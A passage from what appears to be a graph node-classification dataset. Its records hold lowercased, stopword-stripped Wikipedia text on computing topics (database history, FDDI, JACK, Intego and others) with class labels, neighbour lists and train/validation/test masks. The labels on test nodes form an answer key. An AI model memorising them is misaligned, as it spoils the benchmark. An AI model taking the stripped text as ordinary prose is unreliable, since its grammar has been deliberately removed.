performance nosql compared commercially available relational dbmss introduction term database coincided availability direct-access storage disks drums mid-1960s onwards term represented contrast tape-based systems past allowing shared interactive use rather daily batch processing oxford english dictionary cites 1962 report system development corporation california first use term data-base specific technical sense computers grew speed capability number general-purpose database systems emerged mid-1960s number systems come commercial use interest standard began grow charles bachman author one product integrated data store ids founded database task group within codasyl group responsible creation standardization cobol 1971 database task group delivered standard generally became known codasyl approach soon number commercial products based approach entered market codasyl approach relied manual navigation linked data set formed large network applications could find records one three methods later systems added b-trees provide alternate access paths many codasyl databases also added straightforward query language however final tally codasyl complex required significant training effort produce useful applications ibm also dbms 1966 known information management system ims ims development software written apollo program system/360 ims generally similar concept codasyl used strict hierarchy model data navigation instead codasyl network model concepts later became known navigational databases due way data accessed bachman 1973 turing award presentation programmer navigator ims classified ibm hierarchical database idms cincom systems total database classified network databases ims remains use edgar codd worked ibm san jose california one offshoot offices primarily involved development hard disk systems unhappy navigational model codasyl approach notably lack search facility 1970 wrote number papers outlined new approach database construction eventually culminated groundbreaking relational model data large shared data banks paper described new system storing working large databases instead records stored sort linked list free-form records codasyl codd idea use table fixed-length records table used different type entity linked-list system would inefficient storing sparse databases data one record could left empty relational model solved splitting data series normalized tables relations optional elements moved main table would take room needed data may freely inserted deleted edited tables dbms whatever maintenance needed present table view application/user relational model also allowed content database evolve without constant rewriting links pointers relational part comes entities referencing entities known one-to-many relationship like traditional hierarchical model many-to-many relationship like navigational network model thus relational model express hierarchical navigational models well native tabular model allowing pure combined modeling terms three models application requires instance common use database system track information users name login information various addresses phone numbers navigational approach data would placed single record unused items would simply placed database relational approach data would normalized user table address table phone number table instance records would created optional tables address phone numbers actually provided linking information back together key system relational model bit information used key uniquely defining particular record information collected user information stored optional tables would found searching key instance login name user unique addresses phone numbers user would recorded login name key simple re-linking related data back single collection something traditional computer languages designed navigational approach would require programs loop order collect records relational approach would require loops collect information one record codd suggestions set-oriented language would later spawn ubiquitous sql using branch mathematics known tuple calculus demonstrated system could support operations normal databases inserting updating etc well providing simple system finding returning sets data single operation codd paper picked two people berkeley eugene wong michael stonebraker started project known ingres using funding already allocated geographical database project student programmers produce code beginning 1973 ingres delivered first test products generally ready widespread use 1979 ingres similar system r number ways including use language data access known quel time ingres moved emerging sql standard ibm one test implementation relational model prtv production one business system 12 discontinued honeywell wrote mrds multics two new implementations alphora dataphor rel dbms implementations usually called relational actually sql dbmss 1970 university michigan began development micro information management system based d.l childs set-theoretic data model micro used manage large data sets us department labor u.s. environmental protection agency researchers university alberta university michigan wayne state university ran ibm mainframe computers using michigan terminal system system remained production 1998 1970s 1980s attempts made build database systems integrated hardware software underlying philosophy integration would provide higher performance lower cost examples ibm system/38 early offering teradata britton lee inc. database machine another approach hardware support database management icl cafs accelerator hardware disk controller programmable search capabilities long term efforts generally unsuccessful specialized database machines could keep pace rapid development progress general-purpose computers thus database systems nowadays software systems running general-purpose hardware using general-purpose computer data storage however idea still pursued certain applications companies like netezza oracle exadata ibm started working prototype system loosely based codd concepts system r early 1970s first version ready 1974/5 work started multi-table systems data could split data record optional stored single large chunk subsequent multi-user versions tested customers 1978 1979 time standardized query language – sql – added codd ideas establishing workable superior codasyl pushing ibm develop true production version system r known sql/ds later database 2 db2 larry ellison oracle database simply oracle started different chain based ibm papers system r. though oracle v1 implementations completed 1978 n't oracle version 2 ellison beat ibm market 1979 stonebraker went apply lessons ingres develop new database postgres known postgresql postgresql often used global mission critical applications .org .info domain name registries use primary data store many large companies financial institutions sweden codd paper also read mimer sql developed mid-1970s uppsala university 1984 project consolidated independent enterprise another data model entity–relationship model emerged 1976 gained popularity database design emphasized familiar description earlier relational model later entity–relationship constructs retrofitted data modeling construct relational model difference two become irrelevant 1980s ushered age desktop computing new computers empowered users spreadsheets like lotus 1-2-3 database software like dbase dbase product lightweight easy computer user understand box c. wayne ratliff creator dbase stated dbase different programs like basic c fortran cobol lot dirty work already done data manipulation done dbase instead user user concentrate rather mess dirty details opening reading closing files managing space allocation dbase one top selling software titles 1980s early 1990s 1990s along rise object-oriented programming saw growth data various databases handled programmers designers began treat data databases objects say person data database person attributes address phone number age considered belong person instead extraneous data allows relations data relations objects attributes individual fields term object-relational impedance mismatch described inconvenience translating programmed objects database tables object databases object-relational databases attempt solve problem providing object-oriented language sometimes extensions sql programmers use alternative purely relational sql programming side libraries known object-relational mappings orms attempt solve problem xml databases type structured document-oriented database allows querying based xml document attributes xml databases mostly used applications data conveniently viewed collection documents structure vary flexible highly rigid examples include scientific articles patents tax filings personnel records nosql databases often fast require fixed table schemas avoid join operations storing denormalized data designed scale horizontally recent years strong demand massively distributed databases high partition tolerance according cap theorem impossible distributed system simultaneously provide consistency availability partition tolerance guarantees distributed system satisfy two guarantees time three reason many nosql databases using called eventual consistency provide availability partition tolerance guarantees reduced level data consistency newsql class modern relational databases aims provide scalable performance nosql systems online transaction processing read-write workloads still using sql maintaining acid guarantees traditional database system databases used support internal operations organizations underpin online interactions customers suppliers see enterprise software databases used hold administrative information specialized data engineering data economic models examples include computerized library systems flight reservation systems computerized parts inventory systems many content management systems store websites collections webpages database one way classify databases involves type contents example bibliographic document-text statistical multimedia objects another way application area example accounting music compositions movies banking manufacturing insurance third way technical aspect database structure interface type section lists adjectives used characterize different kinds databases connolly begg define database management system dbms software system enables users define create maintain control access database dbms acronym sometime extended indicated underlying database model rdbms relational oodbms ordbms object orientated model ordbms object-relational extensions indicate characteristic ddbms distributed database management systems functionality provided dbms vary enormously core functionality storage retrieval update data codd proposed following functions services fully-fledged general purpose dbms provide also generally expected dbms provide set utilities purposes may necessary administer database effectively including import export monitoring defragmentation analysis utilities core part dbms interacting database application interface sometimes referred database engine often dbmss configuration parameters statically dynamically tuned example maximum amount main memory server database use trend minimise amount manual configuration cases embedded databases need target zero-administration paramount large major enterprise dbmss tended increase size functionality involved thousands human years development effort lifetime early multi-user dbms typically allowed application reside computer access via terminals terminal emulation software client–server architecture development application resided client desktop database server allowing processing distributed evolved multitier architecture incorporating application servers web servers end user interface via web browser database directly connected adjacent tier general-purpose dbms provide public application programming interfaces api optionally processor database languages sql allow applications written interact database special purpose dbms may use private api specifically customised linked single application example email system performing many functions general-purpose dbms message insertion message deletion attachment handling blocklist lookup associating messages email address forth however functions limited required handle email external interaction database via application program interfaces dbms range database tool allows users execute sql queries textually graphically web site happens use database store search information programmer code interactions database sometimes referred datasource via application program interface api via database language particular api language chosen need supported dbms possible indirectly via pre-processor bridging api api aim database independent odbc commonly known example common api include jdbc ado.net database languages special-purpose languages allow one following tasks sometimes distinguished sublanguages database languages specific particular data model notable examples include database language may also incorporate features like database storage container physical materialization database comprises internal physical level database architecture also contains information needed e.g. metadata data data internal data structures reconstruct conceptual level external level internal level needed putting data permanent storage generally responsibility database engine a.k.a storage engine though typically accessed dbms underlying operating system often using operating systems file systems intermediates storage layout storage properties configuration setting extremely important efficient operation dbms thus closely maintained database administrators dbms operation always database residing several types storage e.g. memory external storage database data additional needed information possibly large amounts coded bits data typically reside storage structures look completely different way data look conceptual external levels ways attempt optimize best possible levels reconstruction needed users programs well computing additional types needed information data e.g. querying database dbmss support specifying character encoding used store data multiple encodings used database various low-level database storage structures used storage engine serialize data model written medium choice techniques indexing may used improve performance conventional storage row-oriented also column-oriented correlation databases often storage redundancy employed increase performance common example storing materialized views consist frequently needed external views query results storing views saves expensive computing time needed downsides materialized views overhead incurred updating keep synchronized original updated database data cost storage redundancy occasionally database employs storage redundancy database objects replication one copies increase data availability improve performance simultaneous multiple end-user accesses database object provide resiliency case partial failure distributed database updates replicated object need synchronized across object copies many cases entire database replicated database security deals various aspects protecting database content owners users ranges protection intentional unauthorized database uses unintentional database accesses unauthorized entities e.g. person computer program database access control deals controlling person certain computer program allowed access information database information may comprise specific database objects e.g. record types specific records data structures certain computations certain objects e.g. query types specific queries using specific access paths former e.g. using specific indexes data structures access information database access controls set special authorized database owner personnel uses dedicated protected security dbms interfaces may managed directly individual basis assignment individuals privileges groups elaborate models assignment individuals groups roles granted entitlements data security prevents unauthorized users viewing updating database using passwords users allowed access entire database subsets called subschemas example employee database contain data individual employee one group users may authorized view payroll data others allowed access work history medical data dbms provides way interactively enter update database well interrogate capability allows managing personal databases data security general deals protecting specific chunks data physically i.e. corruption destruction removal e.g. see physical security interpretation parts meaningful information e.g. looking strings bits comprise concluding specific valid credit-card numbers e.g. see data encryption change access logging records accessed attributes changed changed logging services allow forensic database audit later keeping record access occurrences changes sometimes application-level code used record changes rather leaving database monitoring set attempt detect security breaches database transactions used introduce level fault tolerance data integrity recovery crash database transaction unit work typically encapsulating number operations database e.g. reading database object writing acquiring lock etc abstraction supported database also systems transaction well defined boundaries terms program/code executions included transaction determined transaction programmer via special transaction commands acronym acid describes ideal properties database transaction atomicity consistency isolation durability database built one dbms portable another dbms i.e. dbms run however situations desirable migrate database one dbms another reasons primarily economical different dbmss may different total costs ownership tcos functional operational different dbmss may different capabilities migration involves database transformation one dbms type another transformation maintain possible database related application i.e. related application programs intact thus database conceptual external architectural levels maintained transformation may desired also aspects architecture internal level maintained complex large database migration may complicated costly one-time project factored decision migrate spite fact tools may exist help migration specific dbmss typically dbms vendor provides tools help importing databases popular dbmss designing database application next stage building database typically appropriate general-purpose dbms selected used purpose dbms provides needed user interfaces used database administrators define needed application data structures within dbms respective data model user interfaces used select needed dbms parameters like security related storage allocation parameters etc. database ready data structures needed components defined typically populated initial application data database initialization typically distinct project many cases using specialized dbms interfaces support bulk insertion making operational cases database becomes operational empty application data data accumulated operation database created initialised populated needs maintained various database parameters may need changing database may need tuned tuning better performance application data structures may changed added new related application programs may written add application functionality etc sometimes desired bring database back previous state many reasons e.g. cases database found corrupted due software error updated erroneous data achieve backup operation done occasionally continuously desired database state i.e. values data embedding database data structures kept within dedicated backup files many techniques exist effectively decided database administrator bring database back state e.g. specifying state desired point time database state files used restore state static analysis techniques software verification applied also scenario query languages particular *abstract interpretation framework extended field query languages relational databases way support sound approximation techniques semantics query languages tuned according suitable abstractions concrete domain data abstraction relational database system many interesting applications particular security purposes fine grained access control watermarking etc dbms features might include increasingly calls single system incorporates core functionalities build test deployment framework database management source control borrowing developments software industry market offerings devops database first task database designer produce conceptual data model reflects structure information held database common approach develop entity-relationship model often aid drawing tools another popular approach unified modeling language successful data model accurately reflect possible state external world modeled example people one phone number allow information captured designing good conceptual data model requires good understanding application domain typically involves asking deep questions things interest organization like customer also supplier product sold two different forms packaging product different products plane flies new york dubai via frankfurt one flight two maybe even three answers questions establish definitions terminology used entities customers products flights flight segments relationships attributes producing conceptual data model sometimes involves input business processes analysis workflow organization help establish information needed database left example help deciding whether database needs hold historic data well current data produced conceptual data model users happy next stage translate schema implements relevant data structures within database process often called logical database design output logical data model expressed form schema whereas conceptual data model theory least independent choice database technology logical data model expressed terms particular database model supported chosen dbms terms data model database model often used interchangeably article use data model design specific database database model modeling notation used express design popular database model general-purpose databases relational model precisely relational model represented sql language process creating logical database design using model uses methodical approach known normalization goal normalization ensure elementary fact recorded one place insertions updates deletions automatically maintain consistency final stage database design make decisions affect performance scalability recovery security like depend particular dbms often called physical database design output physical data model key goal stage data independence meaning decisions made performance optimization purposes invisible end-users applications two types data independence physical data independence logical data independence physical design driven mainly performance requirements requires good knowledge expected workload access patterns deep understanding features offered chosen dbms another aspect physical database design security involves defining access control database objects well defining security levels methods data database model type data model determines logical structure database fundamentally determines manner data stored organized manipulated popular example database model relational model sql approximation relational uses table-based format common logical data models databases include object-relational database combines two related structures physical data models include models include specialized models optimized particular types data database management system provides three views database data typically one conceptual logical physical internal view data number different external views allows users see database information business-related way rather technical processing viewpoint example financial department company needs payment details employees part company expenses need details employees interest human resources department thus different departments need different views company database three-level database architecture relates concept data independence one major initial driving forces relational model idea changes made certain level affect view higher level example changes internal level affect application programs written using conceptual level interfaces reduces impact making physical changes improve performance conceptual view provides level indirection internal external one hand provides common view database independent different external view structures hand abstracts away details data stored managed internal level principle every level even every external view presented different data model practice usually given dbms uses data model external conceptual levels e.g. relational model internal level hidden inside dbms depends implementation requires different level detail uses types data structure types separating external conceptual internal levels major feature relational database model implementations dominate 21st century databases database technology active research topic since 1960s academia research development groups companies example ibm research research activity includes theory development prototypes notable research topics included models atomic transaction concept related concurrency control techniques query languages query optimization methods raid database research area several dedicated academic journals example acm transactions database systems -tods data knowledge engineering -dke annual conferences e.g. acm sigmod acm pods vldb ieee icde",
    "neighbors": [
      8194,
      2054,
      8201,
      8204,
      10254,
      10258,
      2068,
      8230,
      10286,
      49,
      53,
      6208,
      6212,
      69,
      70,
      8262,
      72,
      8271,
      8277,
      10326,
      4183,
      8280,
      6235,
      8285,
      4194,
      8291,
      10340,
      10342,
      6248,
      8301,
      119,
      10367,
      128,
      133,
      2183,
      140,
      4236,
      10389,
      10393,
      4255,
      8353,
      10404,
      4261,
      4263,
      2217,
      10413,
      2222,
      10418,
      2231,
      2234,
      6330,
      196,
      8389,
      2246,
      201,
      6346,
      8393,
      4301,
      8401,
      8402,
      10452,
      10453,
      2262,
      8413,
      225,
      10471,
      4334,
      6383,
      243,
      4340,
      2294,
      2295,
      8440,
      4347,
      6395,
      8448,
      10498,
      6403,
      261,
      6406,
      8457,
      10505,
      6417,
      6418,
      10518,
      280,
      4376,
      6424,
      8477,
      10525,
      288,
      290,
      2338,
      2339,
      8486,
      2344,
      2345,
      10537,
      6446,
      6451,
      8502,
      10551,
      10553,
      4415,
      4416,
      2369,
      8514,
      8518,
      332,
      10573,
      8528,
      6482,
      2395,
      2414,
      2426,
      4476,
      385,
      10628,
      10632,
      10645,
      2456,
      4507,
      416,
      2466,
      10658,
      8619,
      8636,
      4546,
      8644,
      2501,
      2512,
      467,
      6611,
      8660,
      10709,
      479,
      6627,
      6629,
      2544,
      8689,
      10737,
      4598,
      6654,
      2558,
      8717,
      8719,
      2588,
      8742,
      4647,
      10793,
      8751,
      10804,
      6718,
      8772,
      2632,
      4685,
      8788,
      4696,
      4702,
      10849,
      2658,
      8808,
      4713,
      8810,
      2669,
      8813,
      626,
      6772,
      6775,
      2681,
      2688,
      4763,
      10909,
      673,
      8870,
      10921,
      2733,
      8878,
      10925,
      2737,
      693,
      6838,
      10938,
      4797,
      6850,
      8904,
      4817,
      2775,
      731,
      2780,
      734,
      736,
      6885,
      4844,
      8940,
      4847,
      755,
      2804,
      4861,
      6920,
      11017,
      2828,
      11024,
      2835,
      8979,
      11030,
      8984,
      798,
      4899,
      2852,
      2864,
      9012,
      9015,
      2875,
      832,
      11082,
      847,
      852,
      853,
      2901,
      11098,
      860,
      9052,
      862,
      866,
      9067,
      7022,
      9075,
      9079,
      893,
      11136,
      2953,
      5003,
      9108,
      9112,
      2972,
      929,
      2978,
      5030,
      7080,
      937,
      5034,
      939,
      2990,
      949,
      5047,
      5048,
      3001,
      9143,
      5051,
      3004,
      7100,
      9147,
      5067,
      9177,
      987,
      9183,
      5090,
      3052,
      5100,
      11252,
      7160,
      11264,
      9222,
      7175,
      9224,
      7180,
      3086,
      1039,
      9232,
      5139,
      5140,
      7188,
      7189,
      7191,
      7192,
      1049,
      1051,
      9244,
      7197,
      11294,
      5151,
      9248,
      5157,
      5167,
      1072,
      9263,
      11324,
      11327,
      9286,
      3146,
      9290,
      11343,
      7248,
      3160,
      5208,
      5210,
      11360,
      9314,
      11362,
      9316,
      3176,
      3182,
      11377,
      3191,
      9335,
      1146,
      3196,
      5245,
      3199,
      9343,
      9345,
      11391,
      9348,
      5257,
      5262,
      1169,
      3219,
      5271,
      1178,
      11422,
      7331,
      3240,
      7339,
      9389,
      3250,
      7347,
      9397,
      11457,
      5320,
      11466,
      11474,
      7389,
      9437,
      11487,
      7392,
      1255,
      7399,
      9454,
      3311,
      1264,
      7412,
      7413,
      7418,
      9467,
      5373,
      3326,
      1283,
      7428,
      9481,
      1292,
      3341,
      11538,
      7446,
      5403,
      5404,
      5409,
      1314,
      7461,
      3366,
      11571,
      5431,
      9527,
      3388,
      1341,
      3389,
      5441,
      11586,
      3398,
      5449,
      11596,
      3409,
      7512,
      5467,
      5475,
      11620,
      3431,
      7548,
      5509,
      9610,
      5522,
      1427,
      11674,
      7581,
      9631,
      9634,
      7587,
      3494,
      1447,
      7595,
      11692,
      5550,
      9661,
      9663,
      1480,
      3529,
      3533,
      9677,
      5583,
      5585,
      3541,
      9688,
      7650,
      3556,
      7654,
      3562,
      1516,
      5613,
      9710,
      3570,
      9714,
      5620,
      5625,
      3584,
      5632,
      9729,
      5637,
      5640,
      3600,
      7700,
      5658,
      1567,
      9762,
      1578,
      5678,
      9780,
      9782,
      5691,
      7739,
      1605,
      5706,
      7756,
      3664,
      7762,
      7767,
      9823,
      7776,
      7780,
      9828,
      3690,
      3691,
      3692,
      9837,
      5745,
      1650,
      3698,
      7802,
      1663,
      3712,
      7812,
      1670,
      3721,
      5774,
      7835,
      7837,
      1697,
      5794,
      9890,
      9893,
      5806,
      5808,
      1719,
      3768,
      3771,
      5819,
      7868,
      1726,
      9915,
      5827,
      9926,
      3784,
      9929,
      1739,
      9932,
      3793,
      5841,
      7893,
      9941,
      1751,
      9942,
      1754,
      9949,
      1776,
      5878,
      1783,
      5880,
      5892,
      9988,
      1801,
      7946,
      10004,
      5910,
      10009,
      7967,
      7968,
      7974,
      3880,
      5928,
      5929,
      7983,
      3888,
      1841,
      1850,
      3900,
      10045,
      10048,
      5953,
      5954,
      5960,
      1868,
      8019,
      10069,
      1890,
      3940,
      3951,
      6002,
      8052,
      10104,
      3982,
      10129,
      10137,
      6057,
      6060,
      8111,
      10162,
      8117,
      8122,
      1988,
      6085,
      8136,
      4042,
      2001,
      4050,
      10201,
      8154,
      10207,
      6112,
      4065,
      4066,
      8166,
      2024,
      4074,
      6124,
      6131,
      8181,
      4091,
      8188,
      10239
    ],
    "mask": "Test"
  },
  {
    "node_id": 2902,
    "label": 7,
    "text": "ShopKeep:shopkeep shopkeep cloud-based ipad point sale pos system headquartered new york ny founded 2008 pos system used 23,000 small businesses united states canada retail shops coffee shops restaurants bars system allows merchants ring sales print email receipts pop cash drawer accept credit cards print remotely kitchen right ipad android tablet web-based backoffice allows inventory employee customer management analytics reporting smartphone dashboard app allows merchants view real-time store sales remotely shopkeep co-founded jason richelson co-founder several retail stores brooklyn new york city amy bennett wine store brooklyn fall 2008 point sale software crashed last time david olk former director iac joined third co-founder coo july 2011 help jason amy execute vision raise outside capital eventually closing company first external raise 6 months later december 2011 jason point sale system stores broke decided simpler smarter solution small businesses developed shopkeep pos cloud-based point sale system allow merchants access data even store also developed eyes retailer used expertise create user interface intuitive merchants cashiers stand behind counter jason hired bill walton original system architect engineer build shopkeep platform october 2008 august 2011 first ipad version shopkeep released app store july 2015 shopkeep raised 97 million funding",
    "neighbors": [
      4194,
      10309,
      6539,
      6360,
      7515
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2903,
    "label": 9,
    "text": "Flagship_compiler:flagship compiler flagship object oriented procedural programming language based xbase language dialect conventions flagship available cross-compatible different computer platforms linux unix microsoft windows true compiler translates popular database 4gl xbase source code native 32-bit 64-bit executables using source-code databases first flagship version introduced multisoft datentechnik gmbh 1992 port clipper dbase iii+ foxbase foxpro applications different operating systems i.e openserver aix solaris hp-ux sinix many unix systems 1995 also linux ports became available 2002 visual flagship abbreviated vfs announced linux 2004 additionally 32/64-bit based windows operating systems current vfs product line covers common 32-bit 64-bit operating systems windows nt 2000 xp vista 7 server 2008 flagship programming development tool compilers designed mainly professional software developers simple interface also perfectly suitable semi-professionals advanced computer users need create database applications minimal programming effort thanks full clipper compatibility also best suited porting already available dos applications nearly unix linux ms-windows systems learning curve already familiar xbase dialect like dbase foxbase foxpro clipper visual objects etc millions well-trained programmers using easy powerful 4gl syntax years directly switch flagship n't programming experience xbase familiar language c c++ java pascal delphi basic perl etc learning curve short 10 commands able create first application visual flagship makes gui-based application available textual xbase code automatically course object oriented modify behavior using either classes corresponding functions procedural programming source application supports gui textual stream mode e.g web background i/o mode either detected automatically current environment heterogenal application specified compile time run-time using command-line switch example statements stored text file address.prg ... compiled simply ... creates self-containing executable i.e address.exe windows additional examples screenshots available via external links",
    "neighbors": [
      6020,
      3462,
      4614,
      8582,
      6797,
      10387,
      1304,
      1435,
      9245,
      7326,
      1952,
      3876,
      4777,
      5677,
      823,
      6074,
      6718,
      8644,
      8262,
      5833,
      8524,
      7292,
      7889,
      11219,
      3960,
      2519,
      477,
      6112,
      6502,
      6631,
      10470,
      8554,
      3435,
      10991,
      2929,
      5492,
      2424,
      3705,
      2556,
      2045,
      5374
    ],
    "mask": "Train"
  },
  {
    "node_id": 2904,
    "label": 5,
    "text": "Fiber_Distributed_Data_Interface:fiber distributed data interface fiber distributed data interface fddi standard data transmission local area network uses optical fiber standard underlying physical medium although also later specified use copper cable case may called cddi copper distributed data interface standardized tp-pmd twisted-pair physical medium-dependent also referred tp-ddi twisted-pair distributed data interface fddi effectively made obsolete local networks fast ethernet offered 100 mbit/s speeds much lower cost since 1998 gigabit ethernet due speed even lower cost ubiquity fddi provides 100 mbit/s optical standard data transmission local area network extend range although fddi logical topology ring-based token network use ieee 802.5 token ring protocol basis instead protocol derived ieee 802.4 token bus timed token protocol addition covering large geographical areas fddi local area networks support thousands users fddi offers dual-attached station das counter-rotating token ring topology single-attached station sas token bus passing ring topology fddi product american national standards institute x3t9.5 x3t12 conforms open systems interconnection osi model functional layering using protocols standards process started mid 1980s fddi-ii version fddi described 1989 added circuit-switched service capability network could also handle voice video signals work started connect fddi networks synchronous optical networking sonet technology fddi network contains two rings one secondary backup case primary ring fails primary ring offers 100 mbit/s capacity network requirement secondary ring backup also carry data extending capacity 200 mbit/s single ring extend maximum distance dual ring extend fddi larger maximum-frame size 4,352 bytes standard ethernet family supports maximum-frame size 1,500 bytes allowing better effective data rates cases designers normally constructed fddi rings network topology dual ring trees small number devices typically infrastructure devices routers concentrators rather host computers dual-attached rings host computers connect single-attached devices routers concentrators dual ring degenerate form simply collapses single device typically computer-room contained whole dual ring although implementations deployed fddi metropolitan area network fddi requires network topology dual ring actually passes connected device requires device remain continuously operational standard actually allows optical bypasses network engineers consider unreliable error-prone devices workstations minicomputers might come control network managers suitable connection dual ring alternative using dual-attached connection workstation obtain degree resilience dual-homed connection made simultaneously two separate devices fddi ring one connections becomes active one automatically blocked first connection fails backup link takes perceptible delay fddi data frame format pa preamble sd start delimiter fc frame control da destination address sa source address pdu protocol data unit packet data unit fcs frame check sequence checksum ed/fs end delimiter frame status internet engineering task force defined standard transmission internet protocol would protocol data unit case fddi first proposed june 1989 revised 1990 aspects protocol compatible ieee 802.2 standard logical link control example 48-bit mac addresses became popular ethernet family thus protocols address resolution protocol arp could common well fddi considered attractive campus backbone network technology early mid 1990s since existing ethernet networks offered 10 mbit/s data rates token ring networks offered 4 mbit/s 16 mbit/s rates thus relatively high-speed choice era 1994 vendors included cisco systems national semiconductor network peripherals syskonnect acquired marvell technology group 3com fddi installations largely replaced ethernet deployments fddi standards included",
    "neighbors": [
      10752,
      10242,
      1030,
      7698,
      8211,
      6681,
      6682,
      5149,
      9245,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      6704,
      562,
      1586,
      9269,
      3126,
      1079,
      11321,
      3133,
      5181,
      6723,
      8265,
      1610,
      8266,
      9290,
      4687,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      11387,
      5251,
      649,
      9868,
      3218,
      9365,
      8854,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10413,
      6318,
      10924,
      6834,
      9909,
      5816,
      4793,
      7865,
      4797,
      702,
      7364,
      8904,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      8421,
      5863,
      8426,
      2797,
      751,
      8432,
      2802,
      7411,
      8946,
      6904,
      3322,
      9987,
      3847,
      10005,
      5402,
      11036,
      5405,
      5413,
      9511,
      7984,
      11056,
      10035,
      2869,
      10238,
      8504,
      2362,
      10748,
      829,
      5437,
      5439,
      6977,
      2373,
      2887,
      10058,
      8524,
      849,
      1876,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      367,
      3441,
      3447,
      891,
      6524,
      11647,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      8627,
      2996,
      10171,
      3006,
      9670,
      2509,
      2519,
      4058,
      8669,
      8670,
      4064,
      10723,
      10727,
      3564,
      5614,
      1010,
      6651,
      3580,
      2045,
      5118,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2905,
    "label": 2,
    "text": "Iskolinux:iskolinux iskolinux pronounced is-kooh-lee-nux linux distribution packaged maintained manila upm information management system part university philippines thrust migrate linux coined term filipino word iskolar comes phrase iskolar ng bayan loosely referring students national scholars linux operating system iskolinux based beatrix derived knoppix ubuntu turn derived debian operating system lead developers project ariel s. betan eric manuel n. pareja system developers upm distribution live cd installer giving user option boot operating system directly cd without requiring installation local hard drive iskolinux primarily designed desktop operating system include applications commonly used students faculty staff recent version iskolinux v0.12 uses linux kernel version 2.6.7 gnome 2.8 desktop manager future plans include installation commands manual desktop environment filipino",
    "neighbors": [
      9693,
      7983,
      1150,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2906,
    "label": 4,
    "text": "No_Place_to_Hide_(Greenwald_book):place hide greenwald book place hide edward snowden nsa u.s. surveillance state 2014 non-fiction book american investigative journalist glenn greenwald first published may 13 2014 metropolitan books details greenwald role global surveillance disclosures revealed former national security agency contractor edward snowden documents snowden archive cited book freely available online book consists five chapters contact ten days hong kong collect harm surveillance fourth estate plus introduction epilogue introduction greenwald explains background blogger surveillance practices american government attracted edward snowden attention summarizes nature legality evolution practices greenwald concludes discussing global surveillance network created assistance technology companies unique role internet human history facilitator surveillance body book greenwald discusses became involved 2013 global surveillance disclosures began traveling hong kong meet edward snowden contacted greenwald anonymous source purporting evidence government surveillance greenwald continued investigate uncovered information later published much controversy book greenwald also discusses establishment media states traditionally avoid publishing anything would put odds government less helpful comes interests general public review washington post law professor david cole called place hide important illuminating book wrote would important illuminating greenwald able acknowledge choices face regulating surveillance modern age difficult simple answers slate gave mostly positive review stating book ’ offer in-depth portrait leaker serve good primer stake downloaded government ’ precious secrets onto thumb drive book positively reviewed henry porter guardian porter said found reacquainting details surveillance intrusion america nsa britain gchq simply shocking stories rolled last year almost much absorb ... greenwald book tough read find things disturbing porter said reading place hide wondered ... let spies probe lives inadequate controls earth fell propaganda massive apparatus protect control us critically porter felt book lacked ... chart timeline major revelations well proper index feel argument lost momentum middle ... concluding ... whole vigorously executed important book porter reserved criticism felt lack appreciation greenwald importance efforts ewen macaskill fellow guardian writers bringing disclosures publication glenn greenwald received 2014 geschwister-scholl-preis annual german literary award german edition place hide",
    "neighbors": [
      10697,
      7887,
      7893,
      3495
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2907,
    "label": 4,
    "text": "Intego:intego intego mac security software company company founded 1997 company creates internet security software exclusively mac os x macos including antivirus firewall anti-spam backup software data protection software intego currently offices u.s. seattle washington austin texas also offices paris france nagano japan intego products universal binaries supported several languages english french japanese german spanish italian founded former ceo laurent marteau based paris france intego released first antivirus product 1997 rival antivirus mac os 8 two years later july 1999 intego released netbarrier first personal security software suite mac os 8 october 2000 intego released legacy antivirus software virusbarrier 1.0 mac os 8 mac os 9 intego launched mac security blog mid-2007 blog covers mac security news apple security updates mac malware alerts well news opinion pieces related apple products company launched podcast october 2017 called intego mac podcast intego released current x9 version antivirus security software june 2016",
    "neighbors": [
      2049,
      2563,
      1052,
      550,
      10790,
      2601,
      6699,
      8753,
      569,
      5178,
      9279,
      10308,
      2118,
      2654,
      3167,
      2149,
      8816,
      10872,
      9341,
      127,
      7809,
      131,
      6797,
      1172,
      156,
      2721,
      2213,
      6823,
      3243,
      1708,
      6834,
      704,
      10433,
      7362,
      202,
      4814,
      9423,
      10451,
      1242,
      6364,
      5860,
      10987,
      6382,
      8943,
      9971,
      1273,
      9983,
      1792,
      5891,
      9488,
      4374,
      9496,
      6431,
      10531,
      5924,
      1318,
      8998,
      2859,
      3885,
      4403,
      9523,
      823,
      11577,
      9025,
      1858,
      9537,
      11073,
      4421,
      1355,
      10574,
      8024,
      4953,
      9048,
      2907,
      7515,
      9055,
      9569,
      3941,
      3942,
      11622,
      4464,
      3955,
      2432,
      4480,
      1417,
      3981,
      10637,
      3482,
      1436,
      4511,
      8614,
      8615,
      4013,
      10166,
      7103,
      5057,
      5069,
      7121,
      10708,
      2005,
      4568,
      11225,
      8668,
      9713,
      6643
    ],
    "mask": "None"
  },
  {
    "node_id": 2908,
    "label": 2,
    "text": "JACK_Audio_Connection_Kit:jack audio connection kit jack audio connection kit jack recursive acronym professional sound server daemon provides real-time low-latency connections audio midi data applications use api jack developed community open-source developers led paul davis open source award 2004 work key piece infrastructure de facto standard professional audio software linux since inception 2002 server free software licensed gnu gpl library licensed permissive gnu lgpl jack use alsa portaudio coreaudio ffado oss hardware back-ends additionally dummy driver useful sound output desired e.g offline rendering audio-over-udp driver exist runs linux macos solaris windows ios freebsd openbsd netbsd jack api standardized consensus two compatible implementations exist jack1 implemented plain c maintenance mode jack2 originally jackdmp re-implementation c++ led stéphane letz aggressive development introduced multi-processor scalability support operating systems linux scheduling requirements jack achieve sufficiently low latencies one driving forces behind real-time optimization effort linux kernel 2.6 series whose initial latency performance disappointing compared older 2.4 series real-time tuning work culminated numerous scheduling improvements mainline kernel creation -rt branch intrusive optimizations release 2.6.24 later config_preempt_rt patch",
    "neighbors": [
      1932,
      6797,
      8621,
      7983,
      593,
      6993,
      4499,
      596,
      5909,
      9366,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2909,
    "label": 3,
